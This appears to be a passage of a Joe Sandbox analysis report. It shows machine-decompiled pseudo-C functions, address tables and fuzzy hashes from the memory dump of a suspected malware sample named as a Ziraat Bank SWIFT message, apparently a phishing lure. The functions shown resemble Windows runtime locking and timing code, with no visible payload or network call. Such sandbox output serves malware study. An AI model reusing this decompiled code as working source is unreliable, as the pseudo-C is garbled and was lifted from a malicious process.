                                                                    					}
                                                                    					L18:
                                                                    					_t61 =  &(_t61[1]);
                                                                    					_v12 = _t61;
                                                                    					if(_t61 >= _t96) {
                                                                    						break;
                                                                    					}
                                                                    					_t127 = _v20;
                                                                    				}
                                                                    				_t113 = 0;
                                                                    				goto L9;
                                                                    			}






































                                                                    0x018c2ae4
                                                                    0x018c2aec
                                                                    0x018c2aef
                                                                    0x018c2af4
                                                                    0x018c2af7
                                                                    0x018c2afd
                                                                    0x018c2b92
                                                                    0x018c2b92
                                                                    0x018c2b97
                                                                    0x018c2b9c
                                                                    0x018c2b9c
                                                                    0x018c2b03
                                                                    0x018c2b06
                                                                    0x018c2b09
                                                                    0x018c2b09
                                                                    0x018c2b0f
                                                                    0x018c2b15
                                                                    0x018c2b15
                                                                    0x018c2b1b
                                                                    0x018c2b1e
                                                                    0x018c2b21
                                                                    0x018c2b26
                                                                    0x018c2b29
                                                                    0x018c2b81
                                                                    0x018c2b84
                                                                    0x018c2c0e
                                                                    0x018c2c15
                                                                    0x018c2c24
                                                                    0x018c2c24
                                                                    0x018c2b8a
                                                                    0x018c2b8a
                                                                    0x018c2b8a
                                                                    0x018c2b8a
                                                                    0x018c2b90
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018c2b4a
                                                                    0x018c2b4a
                                                                    0x018c2b4d
                                                                    0x018c2b53
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018c2b55
                                                                    0x018c2b58
                                                                    0x018c2bb7
                                                                    0x01905d1b
                                                                    0x01905d37
                                                                    0x01905d47
                                                                    0x01905d53
                                                                    0x018c2bbd
                                                                    0x018c2bbd
                                                                    0x018c2bbd
                                                                    0x018c2bb7
                                                                    0x018c2b5d
                                                                    0x018c2c2f
                                                                    0x01905d5b
                                                                    0x01905d77
                                                                    0x01905d87
                                                                    0x01905d93
                                                                    0x018c2c35
                                                                    0x018c2c35
                                                                    0x018c2c35
                                                                    0x018c2c2f
                                                                    0x018c2b65
                                                                    0x018c2b9f
                                                                    0x018c2ba2
                                                                    0x018c2b67
                                                                    0x018c2b67
                                                                    0x018c2b69
                                                                    0x018c2b6b
                                                                    0x018c2b6e
                                                                    0x018c2bc9
                                                                    0x018c2bcc
                                                                    0x018c2bcf
                                                                    0x018c2bd4
                                                                    0x018c2bd6
                                                                    0x018c2bd6
                                                                    0x018c2bdb
                                                                    0x018c2c02
                                                                    0x018c2c05
                                                                    0x018c2c07
                                                                    0x00000000
                                                                    0x018c2c07
                                                                    0x018c2be0
                                                                    0x018c2c00
                                                                    0x018c2c3f
                                                                    0x018c2c3f
                                                                    0x00000000
                                                                    0x018c2c00
                                                                    0x018c2be5
                                                                    0x018c2be7
                                                                    0x018c2bec
                                                                    0x018c2bf4
                                                                    0x018c2bf6
                                                                    0x00000000
                                                                    0x018c2bf6
                                                                    0x018c2b70
                                                                    0x018c2b76
                                                                    0x018c2b2b
                                                                    0x018c2b2b
                                                                    0x018c2b2d
                                                                    0x018c2b2f
                                                                    0x018c2b32
                                                                    0x018c2b35
                                                                    0x018c2b3a
                                                                    0x00000000
                                                                    0x018c2b40
                                                                    0x018c2b43
                                                                    0x018c2b45
                                                                    0x018c2b47
                                                                    0x018c2b4a
                                                                    0x018c2b4d
                                                                    0x018c2b53
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018c2b53
                                                                    0x018c2b78
                                                                    0x018c2b78
                                                                    0x018c2b7b
                                                                    0x018c2b7e
                                                                    0x00000000
                                                                    0x018c2b7e
                                                                    0x018c2b76
                                                                    0x018c2ba5
                                                                    0x018c2ba5
                                                                    0x018c2ba8
                                                                    0x018c2bad
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018c2baf
                                                                    0x018c2baf
                                                                    0x018c2bc2
                                                                    0x00000000

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2d83fa94882cc7bf1181102c15cc816e35c2342841ec63f87dbc509e5f1dd6d3
                                                                    • Instruction ID: f1b3d81ce5e2024b92de6f9ceb5e0eb6b45bbd7bc6e360b6f14633ce959d9a3a
                                                                    • Opcode Fuzzy Hash: 2d83fa94882cc7bf1181102c15cc816e35c2342841ec63f87dbc509e5f1dd6d3
                                                                    • Instruction Fuzzy Hash: 0B518E76A00129CFCB18DF1CC8909BDB7F2BB88B04719855EE846EB395D630EA51DB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 86%
                                                                    			E0195AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
                                                                    				signed int _v8;
                                                                    				signed int _v12;
                                                                    				void* __esi;
                                                                    				void* __ebp;
                                                                    				signed short* _t36;
                                                                    				signed int _t41;
                                                                    				char* _t42;
                                                                    				intOrPtr _t43;
                                                                    				signed int _t47;
                                                                    				void* _t52;
                                                                    				signed int _t57;
                                                                    				intOrPtr _t61;
                                                                    				signed char _t62;
                                                                    				signed int _t72;
                                                                    				signed char _t85;
                                                                    				signed int _t88;
                                                                    
                                                                    				_t73 = __edx;
                                                                    				_push(__ecx);
                                                                    				_t85 = __ecx;
                                                                    				_v8 = __edx;
                                                                    				_t61 =  *((intOrPtr*)(__ecx + 0x28));
                                                                    				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
                                                                    				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
                                                                    					_t57 = _t57 | 0x00000001;
                                                                    				}
                                                                    				_t88 = 0;
                                                                    				_t36 = 0;
                                                                    				_t96 = _a12;
                                                                    				if(_a12 == 0) {
                                                                    					_t62 = _a8;
                                                                    					__eflags = _t62;
                                                                    					if(__eflags == 0) {
                                                                    						goto L12;
                                                                    					}
                                                                    					_t52 = E0195C38B(_t85, _t73, _t57, 0);
                                                                    					_t62 = _a8;
                                                                    					 *_t62 = _t52;
                                                                    					_t36 = 0;
                                                                    					goto L11;
                                                                    				} else {
                                                                    					_t36 = E0195ACFD(_t85, _t73, _t96, _t57, _a8);
                                                                    					if(0 == 0 || 0 == 0xffffffff) {
                                                                    						_t72 = _t88;
                                                                    					} else {
                                                                    						_t72 =  *0x00000000 & 0x0000ffff;
                                                                    					}
                                                                    					 *_a12 = _t72;
                                                                    					_t62 = _a8;
                                                                    					L11:
                                                                    					_t73 = _v8;
                                                                    					L12:
                                                                    					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
                                                                    						L19:
                                                                    						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
                                                                    							L22:
                                                                    							_t74 = _v8;
                                                                    							__eflags = _v8;
                                                                    							if(__eflags != 0) {
                                                                    								L25:
                                                                    								__eflags = _t88 - 2;
                                                                    								if(_t88 != 2) {
                                                                    									__eflags = _t85 + 0x44 + (_t88 << 6);
                                                                    									_t88 = E0195FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
                                                                    									goto L34;
                                                                    								}
                                                                    								L26:
                                                                    								_t59 = _v8;
                                                                    								E0195EA55(_t85, _v8, _t57);
                                                                    								asm("sbb esi, esi");
                                                                    								_t88 =  ~_t88;
                                                                    								_t41 = E018B7D50();
                                                                    								__eflags = _t41;
                                                                    								if(_t41 == 0) {
                                                                    									_t42 = 0x7ffe0380;
                                                                    								} else {
                                                                    									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                    								}
                                                                    								__eflags =  *_t42;
                                                                    								if( *_t42 != 0) {
                                                                    									_t43 =  *[fs:0x30];
                                                                    									__eflags =  *(_t43 + 0x240) & 0x00000001;
                                                                    									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
                                                                    										__eflags = _t88;
                                                                    										if(_t88 != 0) {
                                                                    											E01951608(_t85, _t59, 3);
                                                                    										}
                                                                    									}
                                                                    								}
                                                                    								goto L34;
                                                                    							}
                                                                    							_push(_t62);
                                                                    							_t47 = E01961536(0x1988ae4, (_t74 -  *0x1988b04 >> 0x14) + (_t74 -  *0x1988b04 >> 0x14), _t88, __eflags);
                                                                    							__eflags = _t47;
                                                                    							if(_t47 == 0) {
                                                                    								goto L26;
                                                                    							}
                                                                    							_t74 = _v12;
                                                                    							_t27 = _t47 - 1; // -1
                                                                    							_t88 = _t27;
                                                                    							goto L25;
                                                                    						}
                                                                    						_t62 = _t85;
                                                                    						if(L0195C323(_t62, _v8, _t57) != 0xffffffff) {
                                                                    							goto L22;
                                                                    						}
                                                                    						_push(_t62);
                                                                    						_push(_t88);
                                                                    						E0195A80D(_t85, 9, _v8, _t88);
                                                                    						goto L34;
                                                                    					} else {
                                                                    						_t101 = _t36;
                                                                    						if(_t36 != 0) {
                                                                    							L16:
                                                                    							if(_t36 == 0xffffffff) {
                                                                    								goto L19;
                                                                    							}
                                                                    							_t62 =  *((intOrPtr*)(_t36 + 2));
                                                                    							if((_t62 & 0x0000000f) == 0) {
                                                                    								goto L19;
                                                                    							}
                                                                    							_t62 = _t62 & 0xf;
                                                                    							if(E0193CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
                                                                    								L34:
                                                                    								return _t88;
                                                                    							}
                                                                    							goto L19;
                                                                    						}
                                                                    						_t62 = _t85;
                                                                    						_t36 = E0195ACFD(_t62, _t73, _t101, _t57, _t62);
                                                                    						if(_t36 == 0) {
                                                                    							goto L19;
                                                                    						}
                                                                    						goto L16;
                                                                    					}
                                                                    				}
                                                                    			}



















                                                                    0x0195ae44
                                                                    0x0195ae4c
                                                                    0x0195ae53
                                                                    0x0195ae55
                                                                    0x0195ae5c
                                                                    0x0195ae64
                                                                    0x0195ae68
                                                                    0x0195ae75
                                                                    0x0195ae75
                                                                    0x0195ae78
                                                                    0x0195ae7a
                                                                    0x0195ae7c
                                                                    0x0195ae7f
                                                                    0x0195aea8
                                                                    0x0195aeab
                                                                    0x0195aead
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0195aeb3
                                                                    0x0195aeb8
                                                                    0x0195aebb
                                                                    0x0195aebd
                                                                    0x00000000
                                                                    0x0195ae81
                                                                    0x0195ae88
                                                                    0x0195ae8f
                                                                    0x0195ae9b
                                                                    0x0195ae96
                                                                    0x0195ae96
                                                                    0x0195ae96
                                                                    0x0195aea0
                                                                    0x0195aea3
                                                                    0x0195aebf
                                                                    0x0195aebf
                                                                    0x0195aec3
                                                                    0x0195aec9
                                                                    0x0195af0d
                                                                    0x0195af14
                                                                    0x0195af3d
                                                                    0x0195af3d
                                                                    0x0195af41
                                                                    0x0195af44
                                                                    0x0195af67
                                                                    0x0195af67
                                                                    0x0195af6a
                                                                    0x0195afca
                                                                    0x0195afd1
                                                                    0x00000000
                                                                    0x0195afd1
                                                                    0x0195af6c
                                                                    0x0195af6d
                                                                    0x0195af75
                                                                    0x0195af7c
                                                                    0x0195af7e
                                                                    0x0195af80
                                                                    0x0195af85
                                                                    0x0195af87
                                                                    0x0195af99
                                                                    0x0195af89
                                                                    0x0195af92
                                                                    0x0195af92
                                                                    0x0195af9e
                                                                    0x0195afa1
                                                                    0x0195afa3
                                                                    0x0195afa9
                                                                    0x0195afb0
                                                                    0x0195afb2
                                                                    0x0195afb4
                                                                    0x0195afbc
                                                                    0x0195afbc
                                                                    0x0195afb4
                                                                    0x0195afb0
                                                                    0x00000000
                                                                    0x0195afa1
                                                                    0x0195af4f
                                                                    0x0195af57
                                                                    0x0195af5c
                                                                    0x0195af5e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0195af60
                                                                    0x0195af64
                                                                    0x0195af64
                                                                    0x00000000
                                                                    0x0195af64
                                                                    0x0195af1a
                                                                    0x0195af25
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0195af27
                                                                    0x0195af28
                                                                    0x0195af33
                                                                    0x00000000
                                                                    0x0195aed0
                                                                    0x0195aed0
                                                                    0x0195aed2
                                                                    0x0195aee1
                                                                    0x0195aee4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0195aee6
                                                                    0x0195aeec
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0195aefb
                                                                    0x0195af07
                                                                    0x0195afd3
                                                                    0x0195afdb
                                                                    0x0195afdb
                                                                    0x00000000
                                                                    0x0195af07
                                                                    0x0195aed6
                                                                    0x0195aed8
                                                                    0x0195aedf
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0195aedf
                                                                    0x0195aec9

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 988057bc2525cf28677fcbe92f275bee1d474c989b06c59fe973faa83dad2543
                                                                    • Instruction ID: 1c801e0da25c990b4ee26b85289c8199be2c11869632969f79e64e1283670153
                                                                    • Opcode Fuzzy Hash: 988057bc2525cf28677fcbe92f275bee1d474c989b06c59fe973faa83dad2543
                                                                    • Instruction Fuzzy Hash: C541F2B17002119BD766CB2AC894B3BBB9DAFC4621F044719FD1EA72D0DB34E801D7A9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 86%
                                                                    			E018BDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                    				char _v5;
                                                                    				signed int _v12;
                                                                    				signed int* _v16;
                                                                    				intOrPtr _v20;
                                                                    				intOrPtr _v24;
                                                                    				intOrPtr _v28;
                                                                    				intOrPtr _v32;
                                                                    				intOrPtr _v36;
                                                                    				intOrPtr _v40;
                                                                    				intOrPtr _v44;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				signed int _t54;
                                                                    				char* _t58;
                                                                    				signed int _t66;
                                                                    				intOrPtr _t67;
                                                                    				intOrPtr _t68;
                                                                    				intOrPtr _t72;
                                                                    				intOrPtr _t73;
                                                                    				signed int* _t75;
                                                                    				intOrPtr _t79;
                                                                    				intOrPtr _t80;
                                                                    				char _t82;
                                                                    				signed int _t83;
                                                                    				signed int _t84;
                                                                    				signed int _t88;
                                                                    				signed int _t89;
                                                                    				intOrPtr _t90;
                                                                    				intOrPtr _t92;
                                                                    				signed int _t97;
                                                                    				intOrPtr _t98;
                                                                    				intOrPtr* _t99;
                                                                    				signed int* _t101;
                                                                    				signed int* _t102;
                                                                    				intOrPtr* _t103;
                                                                    				intOrPtr _t105;
                                                                    				signed int _t106;
                                                                    				void* _t118;
                                                                    
                                                                    				_t92 = __edx;
                                                                    				_t75 = _a4;
                                                                    				_t98 = __ecx;
                                                                    				_v44 = __edx;
                                                                    				_t106 = _t75[1];
                                                                    				_v40 = __ecx;
                                                                    				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
                                                                    					_t82 = 0;
                                                                    				} else {
                                                                    					_t82 = 1;
                                                                    				}
                                                                    				_v5 = _t82;
                                                                    				_t6 = _t98 + 0xc8; // 0xc9
                                                                    				_t101 = _t6;
                                                                    				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
                                                                    				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
                                                                    				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
                                                                    				if(_t82 != 0) {
                                                                    					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
                                                                    					_t83 =  *_t75;
                                                                    					_t54 = _t75[1];
                                                                    					 *_t101 = _t83;
                                                                    					_t84 = _t83 | _t54;
                                                                    					_t101[1] = _t54;
                                                                    					if(_t84 == 0) {
                                                                    						_t101[1] = _t101[1] & _t84;
                                                                    						 *_t101 = 1;
                                                                    					}
                                                                    					goto L19;
                                                                    				} else {
                                                                    					if(_t101 == 0) {
                                                                    						E0189CC50(E01894510(0xc000000d));
                                                                    						_t88 =  *_t101;
                                                                    						_t97 = _t101[1];
                                                                    						L15:
                                                                    						_v12 = _t88;
                                                                    						_t66 = _t88 -  *_t75;
                                                                    						_t89 = _t97;
                                                                    						asm("sbb ecx, [ebx+0x4]");
                                                                    						_t118 = _t89 - _t97;
                                                                    						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
                                                                    							_t66 = _t66 | 0xffffffff;
                                                                    							_t89 = 0x7fffffff;
                                                                    						}
                                                                    						 *_t101 = _t66;
                                                                    						_t101[1] = _t89;
                                                                    						L19:
                                                                    						if(E018B7D50() != 0) {
                                                                    							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                    						} else {
                                                                    							_t58 = 0x7ffe0386;
                                                                    						}
                                                                    						_t102 = _v16;
                                                                    						if( *_t58 != 0) {
                                                                    							_t58 = E01968ED6(_t102, _t98);
                                                                    						}
                                                                    						_t76 = _v44;
                                                                    						E018B2280(_t58, _v44);
                                                                    						E018BDD82(_v44, _t102, _t98);
                                                                    						E018BB944(_t102, _v5);
                                                                    						return E018AFFB0(_t76, _t98, _t76);
                                                                    					}
                                                                    					_t99 = 0x7ffe03b0;
                                                                    					do {
                                                                    						_t103 = 0x7ffe0010;
                                                                    						do {
                                                                    							_t67 =  *0x1988628; // 0x0
                                                                    							_v28 = _t67;
                                                                    							_t68 =  *0x198862c; // 0x0
                                                                    							_v32 = _t68;
                                                                    							_v24 =  *((intOrPtr*)(_t99 + 4));
                                                                    							_v20 =  *_t99;
                                                                    							while(1) {
                                                                    								_t97 =  *0x7ffe000c;
                                                                    								_t90 =  *0x7FFE0008;
                                                                    								if(_t97 ==  *_t103) {
                                                                    									goto L10;
                                                                    								}
                                                                    								asm("pause");
                                                                    							}
                                                                    							L10:
                                                                    							_t79 = _v24;
                                                                    							_t99 = 0x7ffe03b0;
                                                                    							_v12 =  *0x7ffe03b0;
                                                                    							_t72 =  *0x7FFE03B4;
                                                                    							_t103 = 0x7ffe0010;
                                                                    							_v36 = _t72;
                                                                    						} while (_v20 != _v12 || _t79 != _t72);
                                                                    						_t73 =  *0x1988628; // 0x0
                                                                    						_t105 = _v28;
                                                                    						_t80 =  *0x198862c; // 0x0
                                                                    					} while (_t105 != _t73 || _v32 != _t80);
                                                                    					_t98 = _v40;
                                                                    					asm("sbb edx, [ebp-0x20]");
                                                                    					_t88 = _t90 - _v12 - _t105;
                                                                    					_t75 = _a4;
                                                                    					asm("sbb edx, eax");
                                                                    					_t31 = _t98 + 0xc8; // 0x195fb53
                                                                    					_t101 = _t31;
                                                                    					 *_t101 = _t88;
                                                                    					_t101[1] = _t97;
                                                                    					goto L15;
                                                                    				}
                                                                    			}









































                                                                    0x018bdbe9
                                                                    0x018bdbf2
                                                                    0x018bdbf7
                                                                    0x018bdbf9
                                                                    0x018bdbfc
                                                                    0x018bdc00
                                                                    0x018bdc03
                                                                    0x018bdc14
                                                                    0x018bdd54
                                                                    0x018bdd54
                                                                    0x018bdd54
                                                                    0x018bdc18
                                                                    0x018bdc1d
                                                                    0x018bdc1d
                                                                    0x018bdc32
                                                                    0x018bdc3b
                                                                    0x018bdc3e
                                                                    0x018bdc46
                                                                    0x018bdd5b
                                                                    0x018bdd62
                                                                    0x018bdd64
                                                                    0x018bdd67
                                                                    0x018bdd69
                                                                    0x018bdd6b
                                                                    0x018bdd6e
                                                                    0x018bdd70
                                                                    0x018bdd73
                                                                    0x018bdd73
                                                                    0x00000000
                                                                    0x018bdc4c
                                                                    0x018bdc4e
                                                                    0x01903ae3
                                                                    0x01903ae8
                                                                    0x01903aea
                                                                    0x018bdce7
                                                                    0x018bdce9
                                                                    0x018bdcec
                                                                    0x018bdcee
                                                                    0x018bdcf0
                                                                    0x018bdcf3
                                                                    0x018bdcf5
                                                                    0x01903af2
                                                                    0x01903af5
                                                                    0x01903af5
                                                                    0x018bdd06
                                                                    0x018bdd08
                                                                    0x018bdd0b
                                                                    0x018bdd12
                                                                    0x01903b08
                                                                    0x018bdd18
                                                                    0x018bdd18
                                                                    0x018bdd18
                                                                    0x018bdd20
                                                                    0x018bdd23
                                                                    0x01903b16
                                                                    0x01903b16
                                                                    0x018bdd29
                                                                    0x018bdd2d
                                                                    0x018bdd36
                                                                    0x018bdd40
                                                                    0x018bdd51
                                                                    0x018bdd51
                                                                    0x018bdc54
                                                                    0x018bdc59
                                                                    0x018bdc59
                                                                    0x018bdc5e
                                                                    0x018bdc5e
                                                                    0x018bdc63
                                                                    0x018bdc66
                                                                    0x018bdc6b
                                                                    0x018bdc78
                                                                    0x018bdc7b
                                                                    0x018bdc81
                                                                    0x018bdc81
                                                                    0x018bdc83
                                                                    0x018bdc89
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018bdd7b
                                                                    0x018bdd7b
                                                                    0x018bdc8f
                                                                    0x018bdc8f
                                                                    0x018bdc92
                                                                    0x018bdc99
                                                                    0x018bdc9f
                                                                    0x018bdca5
                                                                    0x018bdcaa
                                                                    0x018bdcaa
                                                                    0x018bdcb3
                                                                    0x018bdcb8
                                                                    0x018bdcbb
                                                                    0x018bdcc1
                                                                    0x018bdccf
                                                                    0x018bdcd2
                                                                    0x018bdcd5
                                                                    0x018bdcd7
                                                                    0x018bdcda
                                                                    0x018bdcdc
                                                                    0x018bdcdc
                                                                    0x018bdce2
                                                                    0x018bdce4
                                                                    0x00000000
                                                                    0x018bdce4

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fb304ec7bc9cfe2495edfa92ff944de1197d4754f4a6f0fc1368539516777696
                                                                    • Instruction ID: f76a1a8d70681ca44eaa3a5ac9b9efcf0f720e04598586cc7b50007a65d6ddb2
                                                                    • Opcode Fuzzy Hash: fb304ec7bc9cfe2495edfa92ff944de1197d4754f4a6f0fc1368539516777696
                                                                    • Instruction Fuzzy Hash: B351B071A01206EFCB15CFACC4D0AAEBBF5BB48318F248259D599E7340DB30AA44CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 96%
                                                                    			E018AEF40(intOrPtr __ecx) {
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				signed int _v12;
                                                                    				intOrPtr _v16;
                                                                    				intOrPtr _v20;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				void* __ebp;
                                                                    				intOrPtr _t58;
                                                                    				char _t59;
                                                                    				signed char _t69;
                                                                    				void* _t73;
                                                                    				signed int _t74;
                                                                    				char _t79;
                                                                    				signed char _t81;
                                                                    				signed int _t85;
                                                                    				signed int _t87;
                                                                    				intOrPtr _t90;
                                                                    				signed char* _t91;
                                                                    				void* _t92;
                                                                    				signed int _t94;
                                                                    				void* _t96;
                                                                    
                                                                    				_t90 = __ecx;
                                                                    				_v16 = __ecx;
                                                                    				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
                                                                    					_t58 =  *((intOrPtr*)(__ecx));
                                                                    					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
                                                                    						E01899080(_t73, __ecx, __ecx, _t92);
                                                                    					}
                                                                    				}
                                                                    				_t74 = 0;
                                                                    				_t96 =  *0x7ffe036a - 1;
                                                                    				_v12 = 0;
                                                                    				_v7 = 0;
                                                                    				if(_t96 > 0) {
                                                                    					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
                                                                    					_v12 = _t74;
                                                                    					_v7 = _t96 != 0;
                                                                    				}
                                                                    				_t79 = 0;
                                                                    				_v8 = 0;
                                                                    				_v5 = 0;
                                                                    				while(1) {
                                                                    					L4:
                                                                    					_t59 = 1;
                                                                    					L5:
                                                                    					while(1) {
                                                                    						if(_t59 == 0) {
                                                                    							L12:
                                                                    							_t21 = _t90 + 4; // 0x77cdc21e
                                                                    							_t87 =  *_t21;
                                                                    							_v6 = 0;
                                                                    							if(_t79 != 0) {
                                                                    								if((_t87 & 0x00000002) != 0) {
                                                                    									goto L19;
                                                                    								}
                                                                    								if((_t87 & 0x00000001) != 0) {
                                                                    									_v6 = 1;
                                                                    									_t74 = _t87 ^ 0x00000003;
                                                                    								} else {
                                                                    									_t51 = _t87 - 2; // -2
                                                                    									_t74 = _t51;
                                                                    								}
                                                                    								goto L15;
                                                                    							} else {
                                                                    								if((_t87 & 0x00000001) != 0) {
                                                                    									_v6 = 1;
                                                                    									_t74 = _t87 ^ 0x00000001;
                                                                    								} else {
                                                                    									_t26 = _t87 - 4; // -4
                                                                    									_t74 = _t26;
                                                                    									if((_t74 & 0x00000002) == 0) {
                                                                    										_t74 = _t74 - 2;
                                                                    									}
                                                                    								}
                                                                    								L15:
                                                                    								if(_t74 == _t87) {
                                                                    									L19:
                                                                    									E01892D8A(_t74, _t90, _t87, _t90);
                                                                    									_t74 = _v12;
                                                                    									_v8 = 1;
                                                                    									if(_v7 != 0 && _t74 > 0x64) {
                                                                    										_t74 = _t74 - 1;
                                                                    										_v12 = _t74;
                                                                    									}
                                                                    									_t79 = _v5;
                                                                    									goto L4;
                                                                    								}
                                                                    								asm("lock cmpxchg [esi], ecx");
                                                                    								if(_t87 != _t87) {
                                                                    									_t74 = _v12;
                                                                    									_t59 = 0;
                                                                    									_t79 = _v5;
                                                                    									continue;
                                                                    								}
                                                                    								if(_v6 != 0) {
                                                                    									_t74 = _v12;
                                                                    									L25:
                                                                    									if(_v7 != 0) {
                                                                    										if(_t74 < 0x7d0) {
                                                                    											if(_v8 == 0) {
                                                                    												_t74 = _t74 + 1;
                                                                    											}
                                                                    										}
                                                                    										_t38 = _t90 + 0x14; // 0x0
                                                                    										_t39 = _t90 + 0x14; // 0x0
                                                                    										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
                                                                    										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                                                    											_t85 = _t85 & 0xff000000;
                                                                    										}
                                                                    										 *(_t90 + 0x14) = _t85;
                                                                    									}
                                                                    									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                    									 *((intOrPtr*)(_t90 + 8)) = 1;
                                                                    									return 0;
                                                                    								}
                                                                    								_v5 = 1;
                                                                    								_t87 = _t74;
                                                                    								goto L19;
                                                                    							}
                                                                    						}
                                                                    						_t94 = _t74;
                                                                    						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
                                                                    						if(_t74 == 0) {
                                                                    							goto L12;
                                                                    						} else {
                                                                    							_t91 = _t90 + 4;
                                                                    							goto L8;
                                                                    							L9:
                                                                    							while((_t81 & 0x00000001) != 0) {
                                                                    								_t69 = _t81;
                                                                    								asm("lock cmpxchg [edi], edx");
                                                                    								if(_t69 != _t81) {
                                                                    									_t81 = _t69;
                                                                    									continue;
                                                                    								}
                                                                    								_t90 = _v16;
                                                                    								goto L25;
                                                                    							}
                                                                    							asm("pause");
                                                                    							_t94 = _t94 - 1;
                                                                    							if(_t94 != 0) {
                                                                    								L8:
                                                                    								_t81 =  *_t91;
                                                                    								goto L9;
                                                                    							} else {
                                                                    								_t90 = _v16;
                                                                    								_t79 = _v5;
                                                                    								goto L12;
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    			}




























                                                                    0x018aef4b
                                                                    0x018aef4d
                                                                    0x018aef57
                                                                    0x018af0bd
                                                                    0x018af0c2
                                                                    0x018af0d2
                                                                    0x018af0d2
                                                                    0x018af0c2
                                                                    0x018aef5d
                                                                    0x018aef5f
                                                                    0x018aef67
                                                                    0x018aef6a
                                                                    0x018aef6d
                                                                    0x018aef74
                                                                    0x018aef7f
                                                                    0x018aef82
                                                                    0x018aef82
                                                                    0x018aef86
                                                                    0x018aef88
                                                                    0x018aef8c
                                                                    0x018aef8f
                                                                    0x018aef8f
                                                                    0x018aef8f
                                                                    0x00000000
                                                                    0x018aef91
                                                                    0x018aef93
                                                                    0x018aefc4
                                                                    0x018aefc4
                                                                    0x018aefc4
                                                                    0x018aefca
                                                                    0x018aefd0
                                                                    0x018af0a6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018af0af
                                                                    0x018fbb06
                                                                    0x018fbb0a
                                                                    0x018af0b5
                                                                    0x018af0b5
                                                                    0x018af0b5
                                                                    0x018af0b5
                                                                    0x00000000
                                                                    0x018aefd6
                                                                    0x018aefd9
                                                                    0x018af0de
